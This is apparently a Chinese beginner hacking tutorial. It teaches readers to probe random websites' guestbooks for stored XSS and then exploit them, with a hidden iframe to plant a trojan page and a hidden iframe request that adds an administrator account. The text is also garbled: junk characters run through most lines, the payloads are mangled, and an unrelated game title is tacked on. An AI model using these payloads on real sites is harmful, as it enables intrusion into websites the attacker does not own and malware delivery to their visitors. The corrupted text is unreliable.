软件简介:5 A2 D4 N* R; x# _6 r7 h. M7 f) i7 F. F
大家好 我是游牧 我们今天继续我们的系列教程 上次和大家讲了用默认数据库来入侵,但是由于现在的网络管理员的安全意识与日俱增 - W+ k0 w5 R, g0 M7 x
所以 这招也并不是屡试不爽 今天给大家提供一个新的思路----跨站(XSS) 当然 为了适合广大菜鸟的知识水平 这节课同样很简单
! T* R9 t+ c3 ^# z$ v. D# ^9 r没有对读代码有任何的要求 我们不懂代码 也能跨站$ T( e7 |9 n! U5 f( o3 x4 t) m
1.发现漏洞0 |$ r0 R, _9 N: g
好了 那我们就开始吧 当然 首先还是要找几个网站 最好多找几个 因为这个漏洞不一定每个都有 下面大家看操作吧8 x7 ?! M* \# W- H% k* g! X+ ^" E
大家点开留言板 在每个能填的地方填入下面的代码 然后查看原代码 查找 scriptalert(/haha/)/script 看到了吗
; M* |$ _) m! ~好了 现在带领大家来读一读代码 以便进步阿 不能总停留在原地嘛
; R& G9 R0 Q6 y$ c9 M( ]+ n4 |" ?好了 下面我们要来利用这个漏洞$ `8 i& P0 R4 D% o1 L
2.利用漏洞
+ K& Q V' `! @4 I利用一 挂马7 x. M4 ?' {5 S2 S. a" z2 g r
iframe scr=http://www.baidu.com width=0/iframe
5 {; I+ r% f' i; v利用二 加用户+ t7 Z; L( h: M( C
iframe scr=/admin/saveadmin.asp?action=add/iframe
/ j' S) x+ U6 y3 o z3 _ QQ:273691522' ~0 R: P9 |: p8 ^
下载地址:
|
最新整理Linux手工服务端_末世策略塔防手游
